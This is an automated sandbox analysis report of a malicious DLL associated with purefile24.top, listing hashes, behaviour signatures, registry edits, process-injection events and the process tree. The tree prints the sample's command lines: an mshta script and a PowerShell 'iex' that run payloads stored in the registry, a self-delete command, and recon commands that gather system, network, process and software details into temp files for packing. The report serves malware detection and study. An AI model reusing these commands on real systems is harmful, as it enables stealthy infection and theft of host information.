Analysis
-
max time kernel
147s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
25-11-2020 23:00
Static task
static1
Behavioral task
behavioral1
Sample
https___purefile24.top_4352wedfoifom.php.dll
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
https___purefile24.top_4352wedfoifom.php.dll
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
https___purefile24.top_4352wedfoifom.php.dll
-
Size
545KB
-
MD5
e221c9a4b1ac13310d037cbc764b86d9
-
SHA1
a7dbb7283b3b164993c1c122189e42509fe5573d
-
SHA256
6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
-
SHA512
56c649d6a79f68924fe55973836f51cb10bbf1ed82366ea3be9be4f8dbf8e56aa4a2aedd933fa977d2109fd9abd7ea947d77e40659f00c80f645a18580cbf12c
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 1164 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 948 set thread context of 1268 948 powershell.exe 21 PID 1268 set thread context of 1164 1268 Explorer.EXE 47 PID 1164 set thread context of 1696 1164 cmd.exe 49 PID 1268 set thread context of 1120 1268 Explorer.EXE 58 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 1212 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1680 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 396 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000437aaaf64589a96ffc566022a1be124d96897f4121af2146aa23ad64a311cc6e000000000e80000000020000200000008e8bc5b57c48d8082810a755d7bdbfa821b2de270816f9482ffc4ad46eab29012000000035d7ccaac6165e556ee5a830e740785fe2846ebe98af48d547ea9d7e2fcebe22400000004fe2193ad4eadde78397e422dc573749c098f1f69f2fb4e6d70ed2a55a6cd8c184abc59235ed54cd37df1d9b689e1101e6c53060a1839b4c33179496e0f9d359 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 306532557ec3d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{99424D41-2F71-11EB-A309-520DDC0DB10A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7DD8F7C1-2F71-11EB-A309-520DDC0DB10A} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000f71f681315a795845610966dc75d8c0dd71cca111f6a7a926b41e82a536c2930000000000e800000000200002000000024cdcfb08a3529873525c1bdf005ce70cfcf6d69471c4028772eab703328e14b9000000066f6b9bfbbe7f1457d4ffed3d50cb4f7760f55344602c80a97cf809820145c3f5d0a54b3c5cfd7a6997eb69ed24ad715fa0f2a7e49c0a60748ab36a3b83693ac4109c60ebd23186761e99103f0a254bf84cebe7f43d0841ac929ea3e7b8a232ca0ef9990d207f8cc2fae3b1093eb2f4a674dbd9a6e368b633d9e80fddc76aa8d4c18c7398936cdb9972a5b37366255fe400000003e6bd3e0666771c24790c95cd2e33e35887ef4b86863bc8485976806a094d18b139472f0de236dc04dcb5bfc97c9a4ac1574dc7f456781cf63b7fd3d3d6b5233 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1696 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1696 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2012 rundll32.exe 948 powershell.exe 948 powershell.exe 1268 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 948 powershell.exe 1268 Explorer.EXE 1164 cmd.exe 1268 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1680 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1364 iexplore.exe 1652 iexplore.exe 1652 iexplore.exe 1652 iexplore.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 1364 iexplore.exe 1364 iexplore.exe 1476 IEXPLORE.EXE 1476 IEXPLORE.EXE 1652 iexplore.exe 1652 iexplore.exe 1936 IEXPLORE.EXE 1936 IEXPLORE.EXE 1652 iexplore.exe 1652 iexplore.exe 544 IEXPLORE.EXE 544 IEXPLORE.EXE 1652 iexplore.exe 1652 iexplore.exe 1936 IEXPLORE.EXE 1936 IEXPLORE.EXE 1268 Explorer.EXE -
Suspicious use of WriteProcessMemory 125 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1732 wrote to memory of 2012 1732 rundll32.exe 25 PID 1364 wrote to memory of 1476 1364 iexplore.exe 33 PID 1364 wrote to memory of 1476 1364 iexplore.exe 33 PID 1364 wrote to memory of 1476 1364 iexplore.exe 33 PID 1364 wrote to memory of 1476 1364 iexplore.exe 33 PID 1652 wrote to memory of 1936 1652 iexplore.exe 36 PID 1652 wrote to memory of 1936 1652 iexplore.exe 36 PID 1652 wrote to memory of 1936 1652 iexplore.exe 36 PID 1652 wrote to memory of 1936 1652 iexplore.exe 36 PID 1652 wrote to memory of 544 1652 iexplore.exe 37 PID 1652 wrote to memory of 544 1652 iexplore.exe 37 PID 1652 wrote to memory of 544 1652 iexplore.exe 37 PID 1652 wrote to memory of 544 1652 iexplore.exe 37 PID 1612 wrote to memory of 948 1612 mshta.exe 41 PID 1612 wrote to memory of 948 1612 mshta.exe 41 PID 1612 wrote to memory of 948 1612 mshta.exe 41 PID 948 wrote to memory of 1120 948 powershell.exe 43 PID 948 wrote to memory of 1120 948 powershell.exe 43 PID 948 wrote to memory of 1120 948 powershell.exe 43 PID 1120 wrote to memory of 1468 1120 csc.exe 44 PID 1120 wrote to memory of 1468 1120 csc.exe 44 PID 1120 wrote to memory of 1468 1120 csc.exe 44 PID 948 wrote to memory of 1716 948 powershell.exe 45 PID 948 wrote to memory of 1716 948 powershell.exe 45 PID 948 wrote to memory of 1716 948 powershell.exe 45 PID 1716 wrote to memory of 1616 1716 csc.exe 46 PID 1716 wrote to memory of 1616 1716 csc.exe 46 PID 1716 wrote to memory of 1616 1716 csc.exe 46 PID 948 wrote to memory of 1268 948 powershell.exe 21 PID 948 wrote to memory of 1268 948 powershell.exe 21 PID 948 wrote to memory of 1268 948 powershell.exe 21 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1268 wrote to memory of 1164 1268 Explorer.EXE 47 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1164 wrote to memory of 1696 1164 cmd.exe 49 PID 1268 wrote to memory of 1996 1268 Explorer.EXE 50 PID 1268 wrote to memory of 1996 1268 Explorer.EXE 50 PID 1268 wrote to memory of 1996 1268 Explorer.EXE 50 PID 1996 wrote to memory of 2040 1996 cmd.exe 52 PID 1996 wrote to memory of 2040 1996 cmd.exe 52 PID 1996 wrote to memory of 2040 1996 cmd.exe 52 PID 1268 wrote to memory of 1956 1268 Explorer.EXE 53 PID 1268 wrote to memory of 1956 1268 Explorer.EXE 53 PID 1268 wrote to memory of 1956 1268 Explorer.EXE 53 PID 1268 wrote to memory of 1852 1268 Explorer.EXE 55 PID 1268 wrote to memory of 1852 1268 Explorer.EXE 55 PID 1268 wrote to memory of 1852 1268 Explorer.EXE 55 PID 1852 wrote to memory of 396 1852 cmd.exe 57 PID 1852 wrote to memory of 396 1852 cmd.exe 57 PID 1852 wrote to memory of 396 1852 cmd.exe 57 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1120 1268 Explorer.EXE 58 PID 1268 wrote to memory of 1360 1268 Explorer.EXE 62 PID 1268 wrote to memory of 1360 1268 Explorer.EXE 62 PID 1268 wrote to memory of 1360 1268 Explorer.EXE 62 PID 1268 wrote to memory of 1544 1268 Explorer.EXE 64 PID 1268 wrote to memory of 1544 1268 Explorer.EXE 64 PID 1268 wrote to memory of 1544 1268 Explorer.EXE 64 PID 1544 wrote to memory of 1212 1544 cmd.exe 66 PID 1544 wrote to memory of 1212 1544 cmd.exe 66 PID 1544 wrote to memory of 1212 1544 cmd.exe 66 PID 1268 wrote to memory of 1940 1268 Explorer.EXE 67 PID 1268 wrote to memory of 1940 1268 Explorer.EXE 67 PID 1268 wrote to memory of 1940 1268 Explorer.EXE 67 PID 1268 wrote to memory of 1860 1268 Explorer.EXE 69 PID 1268 wrote to memory of 1860 1268 Explorer.EXE 69 PID 1268 wrote to memory of 1860 1268 Explorer.EXE 69 PID 1860 wrote to memory of 1356 1860 cmd.exe 71 PID 1860 wrote to memory of 1356 1860 cmd.exe 71 PID 1860 wrote to memory of 1356 1860 cmd.exe 71 PID 1268 wrote to memory of 844 1268 Explorer.EXE 72 PID 1268 wrote to memory of 844 1268 Explorer.EXE 72 PID 1268 wrote to memory of 844 1268 Explorer.EXE 72 PID 1268 wrote to memory of 1616 1268 Explorer.EXE 74 PID 1268 wrote to memory of 1616 1268 Explorer.EXE 74 PID 1268 wrote to memory of 1616 1268 Explorer.EXE 74 PID 1616 wrote to memory of 1680 1616 cmd.exe 76 PID 1616 wrote to memory of 1680 1616 cmd.exe 76 PID 1616 wrote to memory of 1680 1616 cmd.exe 76 PID 1268 wrote to memory of 1056 1268 Explorer.EXE 77 PID 1268 wrote to memory of 1056 1268 Explorer.EXE 77 PID 1268 wrote to memory of 1056 1268 Explorer.EXE 77 PID 1268 wrote to memory of 944 1268 Explorer.EXE 79 PID 1268 wrote to memory of 944 1268 Explorer.EXE 79 PID 1268 wrote to memory of 944 1268 Explorer.EXE 79 PID 944 wrote to memory of 1576 944 cmd.exe 81 PID 944 wrote to memory of 1576 944 cmd.exe 81 PID 944 wrote to memory of 1576 944 cmd.exe 81 PID 1268 wrote to memory of 1188 1268 Explorer.EXE 82 PID 1268 wrote to memory of 1188 1268 Explorer.EXE 82 PID 1268 wrote to memory of 1188 1268 Explorer.EXE 82 PID 1268 wrote to memory of 1612 1268 Explorer.EXE 84 PID 1268 wrote to memory of 1612 1268 Explorer.EXE 84 PID 1268 wrote to memory of 1612 1268 Explorer.EXE 84 PID 1612 wrote to memory of 1532 1612 cmd.exe 86 PID 1612 wrote to memory of 1532 1612 cmd.exe 86 PID 1612 wrote to memory of 1532 1612 cmd.exe 86 PID 1268 wrote to memory of 1148 1268 Explorer.EXE 87 PID 1268 wrote to memory of 1148 1268 Explorer.EXE 87 PID 1268 wrote to memory of 1148 1268 Explorer.EXE 87 PID 1268 wrote to memory of 1952 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1952 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1952 1268 Explorer.EXE 89 PID 1268 wrote to memory of 1680 1268 Explorer.EXE 91 PID 1268 wrote to memory of 1680 1268 Explorer.EXE 91 PID 1268 wrote to memory of 1680 1268 Explorer.EXE 91
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\https___purefile24.top_4352wedfoifom.php.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\https___purefile24.top_4352wedfoifom.php.dll,#13⤵
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CB4B3BAF-AEAE-3526-102F-C23944D3167D\\\Auxisext'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CB4B3BAF-AEAE-3526-102F-C23944D3167D").aepiesrv))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ycjmv342\ycjmv342.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27EB.tmp" "c:\Users\Admin\AppData\Local\Temp\ycjmv342\CSC8E981CB323214962AC5BB986F42BE7C.TMP"5⤵PID:1468
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hfcfniyf\hfcfniyf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2877.tmp" "c:\Users\Admin\AppData\Local\Temp\hfcfniyf\CSC889A7D3AA8E5460FB4BF66324174B0F.TMP"5⤵PID:1616
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\https___purefile24.top_4352wedfoifom.php.dll"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1696
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2A50.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2A50.bi1"2⤵PID:1956
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:396
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1120
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1360
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1544
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1212
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1940
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1860
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1356
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:844
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1616
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1056
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:944
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1188
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:1532
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1148
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4F64.bin1 > C:\Users\Admin\AppData\Local\Temp\4F64.bin & del C:\Users\Admin\AppData\Local\Temp\4F64.bin1"2⤵PID:1952
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\CB3E.bin"2⤵PID:1680
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1476
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1652 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1936
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1652 CREDAT:4076556 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:544
-